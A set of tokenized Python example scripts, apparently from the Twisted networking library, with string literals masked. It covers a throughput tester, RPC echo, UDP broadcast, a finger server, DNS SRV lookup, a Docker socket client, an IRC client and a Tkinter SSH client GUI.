<s> """<STR_LIT>""" <EOL> import socket , time , sys <EOL> TIMES = <NUM_LIT> <EOL> S = "<STR_LIT>" * <NUM_LIT> <EOL> sent = len ( S ) * TIMES <EOL> def main ( ) : <EOL> s = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> s . connect ( ( sys . argv [ <NUM_LIT:1> ] , int ( sys . argv [ <NUM_LIT:2> ] ) ) ) <EOL> start = time . time ( ) <EOL> i = <NUM_LIT:0> <EOL> while i < TIMES : <EOL> i += <NUM_LIT:1> <EOL> s . sendall ( S ) <EOL> passed = time . time ( ) - start <EOL> print "<STR_LIT>" % ( ( sent / passed ) / <NUM_LIT> ) <EOL> s . close ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from twisted . internet import reactor <EOL> from twisted . spread import pb <EOL> from twisted . cred . credentials import UsernamePassword <EOL> from pbecho import DefinedError <EOL> def success ( message ) : <EOL> print "<STR_LIT>" , message <EOL> def failure ( error ) : <EOL> t = error . trap ( DefinedError ) <EOL> print "<STR_LIT>" , t <EOL> reactor . stop ( ) <EOL> def connected ( perspective ) : <EOL> perspective . callRemote ( '<STR_LIT>' , "<STR_LIT>" ) . addCallbacks ( success , failure ) <EOL> perspective . callRemote ( '<STR_LIT:error>' ) . addCallbacks ( success , failure ) <EOL> print "<STR_LIT>" <EOL> factory = pb . PBClientFactory ( ) <EOL> reactor . connectTCP ( "<STR_LIT:localhost>" , pb . portno , factory ) <EOL> factory . login ( <EOL> UsernamePassword ( "<STR_LIT>" , "<STR_LIT>" ) ) . addCallbacks ( connected , failure ) <EOL> reactor . run ( ) </s>
<s> """<STR_LIT>""" <EOL> from uuid import uuid4 <EOL> from twisted . application import internet , service <EOL> from twisted . internet . protocol import DatagramProtocol <EOL> from twisted . python import log <EOL> class PingPongProtocol ( DatagramProtocol ) : <EOL> noisy = False <EOL> def __init__ ( self , controller , port ) : <EOL> self . port = port <EOL> def startProtocol ( self ) : <EOL> self . transport . setBroadcastAllowed ( True ) <EOL> def sendPing ( self ) : <EOL> pingMsg = "<STR_LIT>" . format ( uuid4 ( ) . hex ) <EOL> self . transport . write ( pingMsg , ( '<STR_LIT>' , self . port ) ) <EOL> log . msg ( "<STR_LIT>" + pingMsg ) <EOL> def datagramReceived ( self , datagram , addr ) : <EOL> if datagram [ : <NUM_LIT:4> ] == "<STR_LIT>" : <EOL> uuid = datagram [ <NUM_LIT:5> : ] <EOL> pongMsg = "<STR_LIT>" . format ( uuid ) <EOL> self . transport . write ( pongMsg , ( '<STR_LIT>' , self . port ) ) <EOL> log . msg ( "<STR_LIT>" + datagram ) <EOL> elif datagram [ : <NUM_LIT:4> ] == "<STR_LIT>" : <EOL> log . msg ( "<STR_LIT>" + datagram ) <EOL> class Broadcaster ( object ) : <EOL> def ping ( self , proto ) : <EOL> proto . sendPing ( ) <EOL> def makeService ( self ) : <EOL> application = service . Application ( '<STR_LIT>' ) <EOL> root = service . MultiService ( ) <EOL> root . setServiceParent ( application ) <EOL> proto = PingPongProtocol ( controller = self , port = <NUM_LIT> ) <EOL> root . addService ( internet . UDPServer ( <NUM_LIT> , proto ) ) <EOL> root . addService ( internet . TimerService ( <NUM_LIT:1> , self . ping , proto ) ) <EOL> return application <EOL> application = Broadcaster ( ) . makeService ( ) </s>
<s> from twisted . spread import pb <EOL> from twisted . internet import reactor <EOL> class Two ( pb . Referenceable ) : <EOL> def remote_print ( self , arg ) : <EOL> print "<STR_LIT>" , arg <EOL> class One ( pb . Root ) : <EOL> def __init__ ( self , two ) : <EOL> self . two = two <EOL> def remote_getTwo ( self ) : <EOL> print "<STR_LIT>" , self . two <EOL> return self . two <EOL> def remote_checkTwo ( self , newtwo ) : <EOL> print "<STR_LIT>" , self . two <EOL> print "<STR_LIT>" , newtwo <EOL> if self . two == newtwo : <EOL> print "<STR_LIT>" <EOL> two = Two ( ) <EOL> root_obj = One ( two ) <EOL> reactor . listenTCP ( <NUM_LIT> , pb . PBServerFactory ( root_obj ) ) <EOL> reactor . run ( ) </s>
<s> from twisted . protocols import basic , policies <EOL> from twisted . internet import defer <EOL> class ClientTimeoutError ( Exception ) : <EOL> pass <EOL> class RemoteCalculationClient ( object , basic . LineReceiver , policies . TimeoutMixin ) : <EOL> def __init__ ( self ) : <EOL> self . results = [ ] <EOL> self . _timeOut = <NUM_LIT> <EOL> def lineReceived ( self , line ) : <EOL> self . setTimeout ( None ) <EOL> d = self . results . pop ( <NUM_LIT:0> ) <EOL> d . callback ( int ( line ) ) <EOL> def timeoutConnection ( self ) : <EOL> for d in self . results : <EOL> d . errback ( ClientTimeoutError ( ) ) <EOL> self . transport . loseConnection ( ) <EOL> def _sendOperation ( self , op , a , b ) : <EOL> d = defer . Deferred ( ) <EOL> self . results . append ( d ) <EOL> line = "<STR_LIT>" % ( op , a , b ) <EOL> self . sendLine ( line ) <EOL> self . setTimeout ( self . _timeOut ) <EOL> return d <EOL> def add ( self , a , b ) : <EOL> return self . _sendOperation ( "<STR_LIT>" , a , b ) <EOL> def subtract ( self , a , b ) : <EOL> return self . _sendOperation ( "<STR_LIT>" , a , b ) <EOL> def multiply ( self , a , b ) : <EOL> return self . _sendOperation ( "<STR_LIT>" , a , b ) <EOL> def divide ( self , a , b ) : <EOL> return self . _sendOperation ( "<STR_LIT>" , a , b ) </s>
<s> from twisted . internet import protocol , reactor , defer , utils <EOL> from twisted . protocols import basic <EOL> class FingerProtocol ( basic . LineReceiver ) : <EOL> def lineReceived ( self , user ) : <EOL> d = self . factory . getUser ( user ) <EOL> def onError ( err ) : <EOL> return '<STR_LIT>' <EOL> d . addErrback ( onError ) <EOL> def writeResponse ( message ) : <EOL> self . transport . write ( message + '<STR_LIT:\r\n>' ) <EOL> self . transport . loseConnection ( ) <EOL> d . addCallback ( writeResponse ) <EOL> class FingerFactory ( protocol . ServerFactory ) : <EOL> protocol = FingerProtocol <EOL> def getUser ( self , user ) : <EOL> return utils . getProcessOutput ( "<STR_LIT>" , [ user ] ) <EOL> reactor . listenTCP ( <NUM_LIT> , FingerFactory ( ) ) <EOL> reactor . run ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from twisted . names import client , error <EOL> from twisted . internet . task import react <EOL> from twisted . python import usage <EOL> class Options ( usage . Options ) : <EOL> synopsis = '<STR_LIT>' <EOL> def parseArgs ( self , service , proto , domainname ) : <EOL> self [ '<STR_LIT>' ] = service <EOL> self [ '<STR_LIT>' ] = proto <EOL> self [ '<STR_LIT>' ] = domainname <EOL> def printResult ( records , domainname ) : <EOL> """<STR_LIT>""" <EOL> answers , authority , additional = records <EOL> if answers : <EOL> sys . stdout . write ( <EOL> domainname + '<STR_LIT>' + <EOL> '<STR_LIT>' . join ( str ( x . payload ) for x in answers ) + <EOL> '<STR_LIT:\n>' ) <EOL> else : <EOL> sys . stderr . write ( <EOL> '<STR_LIT>' % ( domainname , ) ) <EOL> def printError ( failure , domainname ) : <EOL> """<STR_LIT>""" <EOL> failure . trap ( error . DNSNameError ) <EOL> sys . stderr . write ( '<STR_LIT>' % ( domainname , ) ) <EOL> def main ( reactor , * argv ) : <EOL> options = Options ( ) <EOL> try : <EOL> options . parseOptions ( argv ) <EOL> except usage . UsageError as errortext : <EOL> sys . stderr . write ( str ( options ) + '<STR_LIT:\n>' ) <EOL> sys . stderr . write ( '<STR_LIT>' % ( errortext , ) ) <EOL> raise SystemExit ( <NUM_LIT:1> ) <EOL> resolver = client . Resolver ( '<STR_LIT>' ) <EOL> domainname = '<STR_LIT>' % options <EOL> d = resolver . lookupService ( domainname ) <EOL> d . addCallback ( printResult , domainname ) <EOL> d . addErrback ( printError , domainname ) <EOL> return d <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> react ( main , sys . argv [ <NUM_LIT:1> : ] ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from sys import argv <EOL> from zope . interface import implementer <EOL> from twisted . internet . endpoints import UNIXClientEndpoint <EOL> from twisted . internet . task import react <EOL> from twisted . web . iweb import IAgentEndpointFactory <EOL> from twisted . web . client import Agent , readBody <EOL> @ implementer ( IAgentEndpointFactory ) <EOL> class DockerEndpointFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , reactor ) : <EOL> self . reactor = reactor <EOL> def endpointForURI ( self , uri ) : <EOL> return UNIXClientEndpoint ( self . reactor , b"<STR_LIT>" ) <EOL> def main ( reactor , path = b"<STR_LIT>" ) : <EOL> agent = Agent . usingEndpointFactory ( reactor , DockerEndpointFactory ( reactor ) ) <EOL> d = agent . request ( b'<STR_LIT:GET>' , b"<STR_LIT>" + path ) <EOL> d . addCallback ( readBody ) <EOL> d . addCallback ( print ) <EOL> return d <EOL> react ( main , argv [ <NUM_LIT:1> : ] ) </s>
<s> """<STR_LIT>""" <EOL> from twisted . words . im import basechat , baseaccount , ircsupport <EOL> accounts = [ <EOL> ircsupport . IRCAccount ( "<STR_LIT>" , <NUM_LIT:1> , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" , <EOL> ) <EOL> ] <EOL> class AccountManager ( baseaccount . AccountManager ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . chatui = MinChat ( ) <EOL> if len ( accounts ) == <NUM_LIT:0> : <EOL> print "<STR_LIT>" <EOL> for acct in accounts : <EOL> acct . logOn ( self . chatui ) <EOL> class MinConversation ( basechat . Conversation ) : <EOL> """<STR_LIT>""" <EOL> def show ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hide ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def showMessage ( self , text , metadata = None ) : <EOL> print "<STR_LIT>" % ( self . person . name , text ) <EOL> def contactChangedNick ( self , person , newnick ) : <EOL> basechat . Conversation . contactChangedNick ( self , person , newnick ) <EOL> print "<STR_LIT>" % ( person . name , newnick ) <EOL> class MinGroupConversation ( basechat . GroupConversation ) : <EOL> """<STR_LIT>""" <EOL> def show ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hide ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def showGroupMessage ( self , sender , text , metadata = None ) : <EOL> print "<STR_LIT>" % ( sender , self . group . name , text ) <EOL> def setTopic ( self , topic , author ) : <EOL> print "<STR_LIT>" % ( author , <EOL> self . group . name , topic ) <EOL> def memberJoined ( self , member ) : <EOL> basechat . GroupConversation . memberJoined ( self , member ) <EOL> print "<STR_LIT>" % ( member , self . group . name ) <EOL> def memberChangedNick ( self , oldnick , newnick ) : <EOL> basechat . GroupConversation . memberChangedNick ( self , oldnick , newnick ) <EOL> print "<STR_LIT>" % ( oldnick , newnick , <EOL> self . group . name ) <EOL> def memberLeft ( self , member ) : <EOL> basechat . GroupConversation . memberLeft ( self , member ) <EOL> print "<STR_LIT>" % ( member , self . group . name ) <EOL> class MinChat ( basechat . ChatUI ) : <EOL> """<STR_LIT>""" <EOL> def getGroupConversation ( self , group , Class = MinGroupConversation , <EOL> stayHidden = <NUM_LIT:0> ) : <EOL> return basechat . ChatUI . getGroupConversation ( self , group , Class , <EOL> stayHidden ) <EOL> def getConversation ( self , person , Class = MinConversation , <EOL> stayHidden = <NUM_LIT:0> ) : <EOL> return basechat . ChatUI . getConversation ( self , person , Class , stayHidden ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> from twisted . internet import reactor <EOL> AccountManager ( ) <EOL> reactor . run ( ) </s>
<s> """<STR_LIT>""" <EOL> import Tkinter , tkFileDialog , tkMessageBox <EOL> from twisted . conch import error <EOL> from twisted . conch . ui import tkvt100 <EOL> from twisted . conch . ssh import transport , userauth , connection , common , keys <EOL> from twisted . conch . ssh import session , forwarding , channel <EOL> from twisted . conch . client . default import isInKnownHosts <EOL> from twisted . internet import reactor , defer , protocol , tksupport <EOL> from twisted . python import usage , log <EOL> import os , sys , getpass , struct , base64 , signal <EOL> class TkConchMenu ( Tkinter . Frame ) : <EOL> def __init__ ( self , * args , ** params ) : <EOL> apply ( Tkinter . Frame . __init__ , ( self , ) + args , params ) <EOL> self . master . title ( '<STR_LIT>' ) <EOL> self . localRemoteVar = Tkinter . StringVar ( ) <EOL> self . localRemoteVar . set ( '<STR_LIT>' ) <EOL> Tkinter . Label ( self , anchor = '<STR_LIT:w>' , justify = '<STR_LIT:left>' , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:1> , sticky = '<STR_LIT:w>' ) <EOL> self . host = Tkinter . Entry ( self ) <EOL> self . host . grid ( column = <NUM_LIT:2> , columnspan = <NUM_LIT:2> , row = <NUM_LIT:1> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , anchor = '<STR_LIT:w>' , justify = '<STR_LIT:left>' , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:2> , sticky = '<STR_LIT:w>' ) <EOL> self . port = Tkinter . Entry ( self ) <EOL> self . port . grid ( column = <NUM_LIT:2> , columnspan = <NUM_LIT:2> , row = <NUM_LIT:2> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , anchor = '<STR_LIT:w>' , justify = '<STR_LIT:left>' , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:3> , sticky = '<STR_LIT:w>' ) <EOL> self . user = Tkinter . Entry ( self ) <EOL> self . user . grid ( column = <NUM_LIT:2> , columnspan = <NUM_LIT:2> , row = <NUM_LIT:3> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , anchor = '<STR_LIT:w>' , justify = '<STR_LIT:left>' , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:4> , sticky = '<STR_LIT:w>' ) <EOL> self . command = Tkinter . Entry ( self ) <EOL> self . command . grid ( column = <NUM_LIT:2> , columnspan = <NUM_LIT:2> , row = <NUM_LIT:4> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , anchor = '<STR_LIT:w>' , justify = '<STR_LIT:left>' , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:5> , sticky = '<STR_LIT:w>' ) <EOL> self . identity = Tkinter . Entry ( self ) <EOL> self . identity . grid ( column = <NUM_LIT:2> , row = <NUM_LIT:5> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Button ( self , command = self . getIdentityFile , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:3> , row = <NUM_LIT:5> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:6> , sticky = '<STR_LIT:w>' ) <EOL> self . forwards = Tkinter . Listbox ( self , height = <NUM_LIT:0> , width = <NUM_LIT:0> ) <EOL> self . forwards . grid ( column = <NUM_LIT:2> , columnspan = <NUM_LIT:2> , row = <NUM_LIT:6> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Button ( self , text = '<STR_LIT>' , command = self . addForward ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:7> ) <EOL> Tkinter . Button ( self , text = '<STR_LIT>' , command = self . removeForward ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:8> ) <EOL> self . forwardPort = Tkinter . Entry ( self ) <EOL> self . forwardPort . grid ( column = <NUM_LIT:2> , row = <NUM_LIT:7> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:3> , row = <NUM_LIT:7> , sticky = '<STR_LIT>' ) <EOL> self . forwardHost = Tkinter . Entry ( self ) <EOL> self . forwardHost . grid ( column = <NUM_LIT:2> , row = <NUM_LIT:8> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:3> , row = <NUM_LIT:8> , sticky = '<STR_LIT>' ) <EOL> self . localForward = Tkinter . Radiobutton ( self , text = '<STR_LIT>' , variable = self . localRemoteVar , value = '<STR_LIT>' ) <EOL> self . localForward . grid ( column = <NUM_LIT:2> , row = <NUM_LIT:9> ) <EOL> self . remoteForward = Tkinter . Radiobutton ( self , text = '<STR_LIT>' , variable = self . localRemoteVar , value = '<STR_LIT>' ) <EOL> self . remoteForward . grid ( column = <NUM_LIT:3> , row = <NUM_LIT:9> ) <EOL> Tkinter . Label ( self , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , columnspan = <NUM_LIT:3> , row = <NUM_LIT:10> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , anchor = '<STR_LIT:w>' , justify = '<STR_LIT:left>' , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:11> , sticky = '<STR_LIT:w>' ) <EOL> self . cipher = Tkinter . Entry ( self , name = '<STR_LIT>' ) <EOL> self . cipher . grid ( column = <NUM_LIT:2> , columnspan = <NUM_LIT:2> , row = <NUM_LIT:11> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , anchor = '<STR_LIT:w>' , justify = '<STR_LIT:left>' , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:12> , sticky = '<STR_LIT:w>' ) <EOL> self . mac = Tkinter . Entry ( self , name = '<STR_LIT>' ) <EOL> self . mac . grid ( column = <NUM_LIT:2> , columnspan = <NUM_LIT:2> , row = <NUM_LIT:12> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , anchor = '<STR_LIT:w>' , justify = '<STR_LIT:left>' , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT> , sticky = '<STR_LIT:w>' ) <EOL> self . escape = Tkinter . Entry ( self , name = '<STR_LIT>' ) <EOL> self . escape . grid ( column = <NUM_LIT:2> , columnspan = <NUM_LIT:2> , row = <NUM_LIT> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Button ( self , text = '<STR_LIT>' , command = self . doConnect ) . grid ( column = <NUM_LIT:1> , columnspan = <NUM_LIT:3> , row = <NUM_LIT> , sticky = '<STR_LIT>' ) <EOL> self . grid_rowconfigure ( <NUM_LIT:6> , weight = <NUM_LIT:1> , minsize = <NUM_LIT:64> ) <EOL> self . grid_columnconfigure ( <NUM_LIT:2> , weight = <NUM_LIT:1> , minsize = <NUM_LIT:2> ) <EOL> self . master . protocol ( "<STR_LIT>" , sys . exit ) <EOL> def getIdentityFile ( self ) : <EOL> r = tkFileDialog . askopenfilename ( ) <EOL> if r : <EOL> self . identity . delete ( <NUM_LIT:0> , Tkinter . END ) <EOL> self . identity . insert ( Tkinter . END , r ) <EOL> def addForward ( self ) : <EOL> port = self . forwardPort . get ( ) <EOL> self . forwardPort . delete ( <NUM_LIT:0> , Tkinter . END ) <EOL> host = self . forwardHost . get ( ) <EOL> self . forwardHost . delete ( <NUM_LIT:0> , Tkinter . END ) <EOL> if self . localRemoteVar . get ( ) == '<STR_LIT>' : <EOL> self . forwards . insert ( Tkinter . END , '<STR_LIT>' % ( port , host ) ) <EOL> else : <EOL> self . forwards . insert ( Tkinter . END , '<STR_LIT>' % ( port , host ) ) <EOL> def removeForward ( self ) : <EOL> cur = self . forwards . curselection ( ) <EOL> if cur : <EOL> self . forwards . remove ( cur [ <NUM_LIT:0> ] ) <EOL> def doConnect ( self ) : <EOL> finished = <NUM_LIT:1> <EOL> options [ '<STR_LIT:host>' ] = self . host . get ( ) <EOL> options [ '<STR_LIT:port>' ] = self . port . get ( ) <EOL> options [ '<STR_LIT:user>' ] = self . user . get ( ) <EOL> options [ '<STR_LIT>' ] = self . command . get ( ) <EOL> cipher = self . cipher . get ( ) <EOL> mac = self . mac . get ( ) <EOL> escape = self . escape . get ( ) <EOL> if cipher : <EOL> if cipher in SSHClientTransport . supportedCiphers : <EOL> SSHClientTransport . supportedCiphers = [ cipher ] <EOL> else : <EOL> tkMessageBox . showerror ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> finished = <NUM_LIT:0> <EOL> if mac : <EOL> if mac in SSHClientTransport . supportedMACs : <EOL> SSHClientTransport . supportedMACs = [ mac ] <EOL> elif finished : <EOL> tkMessageBox . showerror ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> finished = <NUM_LIT:0> <EOL> if escape : <EOL> if escape == '<STR_LIT:none>' : <EOL> options [ '<STR_LIT>' ] = None <EOL> elif escape [ <NUM_LIT:0> ] == '<STR_LIT>' and len ( escape ) == <NUM_LIT:2> : <EOL> options [ '<STR_LIT>' ] = chr ( ord ( escape [ <NUM_LIT:1> ] ) - <NUM_LIT:64> ) <EOL> elif len ( escape ) == <NUM_LIT:1> : <EOL> options [ '<STR_LIT>' ] = escape <EOL> elif finished : <EOL> tkMessageBox . showerror ( '<STR_LIT>' , "<STR_LIT>" % escape ) <EOL> finished = <NUM_LIT:0> <EOL> if self . identity . get ( ) : <EOL> options . identitys . append ( self . identity . get ( ) ) <EOL> for line in self . forwards . get ( <NUM_LIT:0> , Tkinter . END ) : <EOL> if line [ <NUM_LIT:0> ] == '<STR_LIT:L>' : <EOL> options . opt_localforward ( line [ <NUM_LIT:2> : ] ) <EOL> else : <EOL> options . opt_remoteforward ( line [ <NUM_LIT:2> : ] ) <EOL> if '<STR_LIT:@>' in options [ '<STR_LIT:host>' ] : <EOL> options [ '<STR_LIT:user>' ] , options [ '<STR_LIT:host>' ] = options [ '<STR_LIT:host>' ] . split ( '<STR_LIT:@>' , <NUM_LIT:1> ) <EOL> if ( not options [ '<STR_LIT:host>' ] or not options [ '<STR_LIT:user>' ] ) and finished : <EOL> tkMessageBox . showerror ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> finished = <NUM_LIT:0> <EOL> if finished : <EOL> self . master . quit ( ) <EOL> self . master . destroy ( ) <EOL> if options [ '<STR_LIT>' ] : <EOL> realout = sys . stdout <EOL> log . startLogging ( sys . stderr ) <EOL> sys . stdout = realout <EOL> else : <EOL> log . discardLogs ( ) <EOL> log . deferr = handleError <EOL> if not options . identitys : <EOL> options . identitys = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> host = options [ '<STR_LIT:host>' ] <EOL> port = int ( options [ '<STR_LIT:port>' ] or <NUM_LIT> ) <EOL> log . msg ( ( host , port ) ) <EOL> reactor . connectTCP ( host , port , SSHClientFactory ( ) ) <EOL> frame . master . deiconify ( ) <EOL> frame . master . title ( '<STR_LIT>' % ( options [ '<STR_LIT:user>' ] , options [ '<STR_LIT:host>' ] ) ) <EOL> else : <EOL> self . focus ( ) <EOL> class GeneralOptions ( usage . Options ) : <EOL> synopsis = """<STR_LIT>""" <EOL> optParameters = [ [ '<STR_LIT:user>' , '<STR_LIT:l>' , None , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:i>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:e>' , '<STR_LIT>' , "<STR_LIT>" ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:c>' , None , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:m>' , None , '<STR_LIT>' ] , <EOL> [ '<STR_LIT:port>' , '<STR_LIT:p>' , None , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:L>' , None , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:R>' , None , '<STR_LIT>' ] , <EOL> ] <EOL> optFlags = [ [ '<STR_LIT>' , '<STR_LIT:t>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:T>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT:version>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:C>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:N>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:s>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:v>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:a>' , '<STR_LIT>' ] ] <EOL> _ciphers = transport . SSHClientTransport . supportedCiphers <EOL> _macs = transport . SSHClientTransport . supportedMACs <EOL> compData = usage . Completions ( <EOL> mutuallyExclusive = [ ( "<STR_LIT>" , "<STR_LIT>" ) ] , <EOL> optActions = { <EOL> "<STR_LIT>" : usage . CompleteList ( _ciphers ) , <EOL> "<STR_LIT>" : usage . CompleteList ( _macs ) , <EOL> "<STR_LIT>" : usage . Completer ( descr = "<STR_LIT>" ) , <EOL> "<STR_LIT>" : usage . Completer ( descr = "<STR_LIT>" ) } , <EOL> extraActions = [ usage . CompleteUserAtHost ( ) , <EOL> usage . Completer ( descr = "<STR_LIT>" ) , <EOL> usage . Completer ( descr = "<STR_LIT>" , repeat = True ) ] <EOL> ) <EOL> identitys = [ ] <EOL> localForwards = [ ] <EOL> remoteForwards = [ ] <EOL> def opt_identity ( self , i ) : <EOL> self . identitys . append ( i ) <EOL> def opt_localforward ( self , f ) : <EOL> localPort , remoteHost , remotePort = f . split ( '<STR_LIT::>' ) <EOL> localPort = int ( localPort ) <EOL> remotePort = int ( remotePort ) <EOL> self . localForwards . append ( ( localPort , ( remoteHost , remotePort ) ) ) <EOL> def opt_remoteforward ( self , f ) : <EOL> remotePort , connHost , connPort = f . split ( '<STR_LIT::>' ) <EOL> remotePort = int ( remotePort ) <EOL> connPort = int ( connPort ) <EOL> self . remoteForwards . append ( ( remotePort , ( connHost , connPort ) ) ) <EOL> def opt_compress ( self ) : <EOL> SSHClientTransport . supportedCompressions [ <NUM_LIT:0> : <NUM_LIT:1> ] = [ '<STR_LIT>' ] <EOL> def parseArgs ( self , * args ) : <EOL> if args : <EOL> self [ '<STR_LIT:host>' ] = args [ <NUM_LIT:0> ] <EOL> self [ '<STR_LIT>' ] = '<STR_LIT:U+0020>' . join ( args [ <NUM_LIT:1> : ] ) <EOL> else : <EOL> self [ '<STR_LIT:host>' ] = '<STR_LIT>' <EOL> self [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> options = None <EOL> menu = None <EOL> exitStatus = <NUM_LIT:0> <EOL> frame = None <EOL> def deferredAskFrame ( question , echo ) : <EOL> if frame . callback : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> d = defer . Deferred ( ) <EOL> resp = [ ] <EOL> def gotChar ( ch , resp = resp ) : <EOL> if not ch : return <EOL> if ch == '<STR_LIT>' : <EOL> reactor . stop ( ) <EOL> if ch == '<STR_LIT:\r>' : <EOL> frame . write ( '<STR_LIT:\r\n>' ) <EOL> stresp = '<STR_LIT>' . join ( resp ) <EOL> del resp <EOL> frame . callback = None <EOL> d . callback ( stresp ) <EOL> return <EOL> elif <NUM_LIT:32> <= ord ( ch ) < <NUM_LIT> : <EOL> resp . append ( ch ) <EOL> if echo : <EOL> frame . write ( ch ) <EOL> elif ord ( ch ) == <NUM_LIT:8> and resp : <EOL> if echo : frame . write ( '<STR_LIT>' ) <EOL> resp . pop ( ) <EOL> frame . callback = gotChar <EOL> frame . write ( question ) <EOL> frame . canvas . focus_force ( ) <EOL> return d <EOL> def run ( ) : <EOL> global menu , options , frame <EOL> args = sys . argv [ <NUM_LIT:1> : ] <EOL> if '<STR_LIT>' in args : <EOL> i = args . index ( '<STR_LIT>' ) <EOL> args = args [ i : i + <NUM_LIT:2> ] + args <EOL> del args [ i + <NUM_LIT:2> : i + <NUM_LIT:4> ] <EOL> for arg in args [ : ] : <EOL> try : <EOL> i = args . index ( arg ) <EOL> if arg [ : <NUM_LIT:2> ] == '<STR_LIT>' and args [ i + <NUM_LIT:1> ] [ <NUM_LIT:0> ] != '<STR_LIT:->' : <EOL> args [ i : i + <NUM_LIT:2> ] = [ ] <EOL> except ValueError : <EOL> pass <EOL> root = Tkinter . Tk ( ) <EOL> root . withdraw ( ) <EOL> top = Tkinter . Toplevel ( ) <EOL> menu = TkConchMenu ( top ) <EOL> menu . pack ( side = Tkinter . TOP , fill = Tkinter . BOTH , expand = <NUM_LIT:1> ) <EOL> options = GeneralOptions ( ) <EOL> try : <EOL> options . parseOptions ( args ) <EOL> except usage . UsageError , u : <EOL> print '<STR_LIT>' % u <EOL> options . opt_help ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> for k , v in options . items ( ) : <EOL> if v and hasattr ( menu , k ) : <EOL> getattr ( menu , k ) . insert ( Tkinter . END , v ) <EOL> for ( p , ( rh , rp ) ) in options . localForwards : <EOL> menu . forwards . insert ( Tkinter . END , '<STR_LIT>' % ( p , rh , rp ) ) <EOL> options . localForwards = [ ] <EOL> for ( p , ( rh , rp ) ) in options . remoteForwards : <EOL> menu . forwards . insert ( Tkinter . END , '<STR_LIT>' % ( p , rh , rp ) ) <EOL> options . remoteForwards = [ ] <EOL> frame = tkvt100 . VT100Frame ( root , callback = None ) <EOL> root . geometry ( '<STR_LIT>' % ( tkvt100 . fontWidth * frame . width + <NUM_LIT:3> , tkvt100 . fontHeight * frame . height + <NUM_LIT:3> ) ) <EOL> frame . pack ( side = Tkinter . TOP ) <EOL> tksupport . install ( root ) <EOL> root . withdraw ( ) <EOL> if ( options [ '<STR_LIT:host>' ] and options [ '<STR_LIT:user>' ] ) or '<STR_LIT:@>' in options [ '<STR_LIT:host>' ] : <EOL> menu . doConnect ( ) <EOL> else : <EOL> top . mainloop ( ) <EOL> reactor . run ( ) <EOL> sys . exit ( exitStatus ) <EOL> def handleError ( ) : <EOL> from twisted . python import failure <EOL> global exitStatus <EOL> exitStatus = <NUM_LIT:2> <EOL> log . err ( failure . Failure ( ) ) <EOL> reactor . stop ( ) <EOL> raise 